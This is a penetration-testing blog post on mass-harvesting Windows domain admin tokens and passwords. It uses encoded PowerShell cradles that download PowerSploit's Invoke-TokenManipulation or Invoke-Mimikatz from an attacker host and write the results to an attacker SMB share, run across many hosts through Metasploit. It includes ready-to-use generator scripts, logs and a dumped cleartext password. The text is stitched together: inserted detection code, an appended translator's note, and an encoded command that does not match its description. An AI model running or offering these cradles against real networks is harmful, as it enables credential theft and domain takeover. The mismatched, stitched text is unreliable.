source: https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/
I’ve been searching quite a while now for the best way to hunt for domain admin tokens once admin rights are attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that still have a domain admin Kerberos security token loaded in memory. There are a couple of “Token_Hunter” post modules, but you need a shell on each system to run them, which can take a long time: establish the shell, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.
The first article is from Chris Campbell posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnage, HarmJoy
To set up the environment, I first downloaded PowerSploit to my Apache directory:
```shell
cd /var/www/
git clone https://github.com/mattifestation/PowerSploit.git
```
Then configured Samba with an open share to capture the output files:
```
nano /etc/samba/smb.conf

[loot$]
comment = Loot
path = /root/loot
browseable = yes
read only = no
guest ok = yes
public = yes
```
Then create the folder and grant full permissions. I created a folder named “tokens” under “loot”.
Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:
```powershell
IEX (New-Object Net.WebClient).DownloadString("http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt
```
This will download “Invoke-TokenManipulation.ps1” from my web host, execute it in memory to enumerate tokens, and pipe the output to my SMB share into a file named after the computer.
Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.
```
msf auxiliary(psexec_command) > info

       Name: Microsoft Windows Authenticated Administration Utility
     Module: auxiliary/admin/smb/psexec_command
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis @R3dy__

Basic options:
  Name                  Current Setting  Required  Description
  ----                  ---------------  --------  -----------
  COMMAND                                yes       The command you want to execute on the remote host
  RHOSTS                192.168.81.10    yes       The target address range or CIDR identifier
  RPORT                 445              yes       The Target port
  SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                   no        The service display name
  SERVICE_NAME                           no        The service name
  SMBDomain             pwnt.com         no        The Windows domain to use for authentication
  SMBPass               LoveGoats!       no        The password for the specified username
  SMBSHARE              C$               yes       The name of a writeable share on the server
  SMBUser               TrustedSec       no        The username to authenticate as
  THREADS               255              yes       The number of concurrent threads
  WINPATH               WINDOWS          yes       The name of the remote Windows directory

Description:
  This module uses a valid administrator username and password to
  execute an arbitrary command on one or more hosts, using a similar
  technique than the "psexec" utility provided by SysInternals. Daisy
  chaining commands with '&' does not work and users shouldn't try it.
  This module is useful because it doesn't need to upload any binaries
  to the target machine.

References:
  http://cvedetails.com/cve/1999-0504/
  http://www.osvdb.org/3106
  http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
  http://sourceforge.net/projects/smbexec/
  http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA
command => powershell -nop -win hidden -noni -enc [same encoded string echoed back]
msf auxiliary(psexec_command) > run

[*] 192.168.81.10:445 - Executing the command...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] checking if the file is unlocked
[*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.81.10:445 - Getting the command output...
[*] 192.168.81.10:445 - Command finished with no output
[*] 192.168.81.10:445 - Executing cleanup...
[-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.10:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
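The encoded string handed to psexec_command above is nothing more than the one-liner as UTF-16LE text, base64-encoded (the scheme borrowed from unicorn), and the same property lets a defender reverse it. The following Python is an added example, not code from this post or from TrustedSec: it decodes an encoded PowerShell command line recovered from a record such as a service-installation event and flags the download-cradle traits this technique leaves behind (IEX, a Net.WebClient download, a PowerSploit module name, Out-File to a UNC share). The event records, the service names and the 203.0.113.5 address are constructed for the example; the (service name, image path) record shape and the indicator list are assumptions, not something the post specifies.

```python
import base64
import re


def encode_powershell(command: str) -> str:
    """Encode a command the way `powershell -enc` expects it: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf_16_le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell; tolerates stripped '=' padding and stray bytes."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf_16_le", errors="replace")


# powershell[.exe] ... -e / -ec / -en / -enc / -encodedcommand <base64>
ENC_RE = re.compile(
    r"(?i)powershell(?:\.exe)?\b.*?\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})"
)

# Traits of an in-memory download cradle that writes its output to a remote share.
# Assumed indicator set for this example; tune it to the environment.
INDICATORS = {
    "iex": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "webclient_download": re.compile(r"(?i)Net\.WebClient.*?Download(?:String|File|Data)"),
    "powersploit_module": re.compile(r"(?i)Invoke-(?:TokenManipulation|Mimikatz)"),
    "unc_outfile": re.compile(r"(?i)Out-File\b.*?-FilePath\s+\\\\[^\\\s]+\\"),
}


def analyse_command_line(cmdline: str) -> dict:
    """Decode the encoded PowerShell command in cmdline, if any, and list indicator hits."""
    m = ENC_RE.search(cmdline)
    if not m:
        return {"encoded": False, "decoded": None, "hits": []}
    decoded = decode_powershell(m.group(1))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"encoded": True, "decoded": decoded, "hits": hits}


def scan_service_installs(events):
    """events: iterable of (service_name, image_path) pairs, e.g. pulled from System log
    event 7045. Returns one finding per event whose decoded command hits an indicator."""
    findings = []
    for service, image_path in events:
        result = analyse_command_line(image_path)
        if result["encoded"] and result["hits"]:
            findings.append({"service": service, "hits": result["hits"], "decoded": result["decoded"]})
    return findings


# Constructed sample: the post's one-liner with a placeholder address, encoded exactly as
# TokenHunter.py encodes it, embedded in a constructed service image path.
SAMPLE_COMMAND = (
    'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");'
    'Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" '
    '-FilePath \\\\203.0.113.5\\loot$\\tokens\\$env:computername.txt'
)

CONSTRUCTED_EVENTS = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("qXhZtLmPwR", "cmd.exe /c powershell -nop -win hidden -noni -enc " + encode_powershell(SAMPLE_COMMAND)),
    ("Benign", "powershell.exe -enc " + encode_powershell("Get-Date")),
]

if __name__ == "__main__":
    for finding in scan_service_installs(CONSTRUCTED_EVENTS):
        print(finding["service"], finding["hits"])
        print("   ", finding["decoded"][:80], "...")
```

Only the constructed service carrying the cradle produces a finding; the benign encoded `Get-Date` decodes cleanly but hits nothing, which is the point of decoding before matching rather than alerting on `-enc` alone.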
Then, just egrep the files to enumerate any domain admins.
```shell
root@trustedsec4-lin:~/loot/tokens# egrep -i 'trustedsec|admin' * /dev/null
PWNT-DC.txt:Username : TrustedSec
```
All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.
The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:
```shell
root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null
PWNT-DC.txt:User Name : TrustedSec
PWNT-DC.txt-Domain : PWNT
PWNT-DC.txt-SID : S-1-5-21-999999-88888888888-12000000000-1000
--
PWNT-DC.txt: * Username : TrustedSec
PWNT-DC.txt- * Domain : PWNT
PWNT-DC.txt- * NTLM :
--
PWNT-DC.txt: * Username : TrustedSec
PWNT-DC.txt- * Domain : PWNT
PWNT-DC.txt- * Password : LoveGoats!
```
The scripts are below. Happy Hunting!
TokenHunter.py
```python
#!/usr/bin/env python
# This downloads "Invoke-TokenManipulation.ps1" from the attacker's webhost,
# then executes the script in memory and pipes its output to the attacker's SMB share
# "\\loot$\tokens\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# Script Dependency
# https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration
#
# TrustedSec

import base64

# Address of the web host serving PowerSploit and of the SMB share (placeholder; fill in before use)
attacker_ip = "<attacker_ip>"

# Main guts
def main():
    powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\tokens\\$env:computername.txt"
    # powershell -enc expects the command as UTF-16LE text, base64-encoded (same scheme as unicorn)
    full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le')).decode('ascii')
    print(full_attack)

# Standard boilerplate to call the main() function
if __name__ == '__main__':
    main()
```
PasswordHunter.py
```python
#!/usr/bin/env python
# This downloads "Invoke-Mimikatz.ps1" from the attacker's webhost,
# then executes the script in memory and pipes its output to the attacker's SMB share
# "\\loot$\passwords\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# TrustedSec

import base64

# Address of the web host serving PowerSploit and of the SMB share (placeholder; fill in before use)
attacker_ip = "<attacker_ip>"

# Main guts
def main():
    powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");Invoke-Mimikatz -DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\passwords\\$env:computername.txt"
    # powershell -enc expects the command as UTF-16LE text, base64-encoded (same scheme as unicorn)
    full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le')).decode('ascii')
    print(full_attack)

# Standard boilerplate to call the main() function
if __name__ == '__main__':
    main()
```
(Translation finished. My own understanding: this is a tool for harvesting user tokens and passwords in bulk.)
Account Hunting for Invoke-TokenManipulation (account hunting before token impersonation)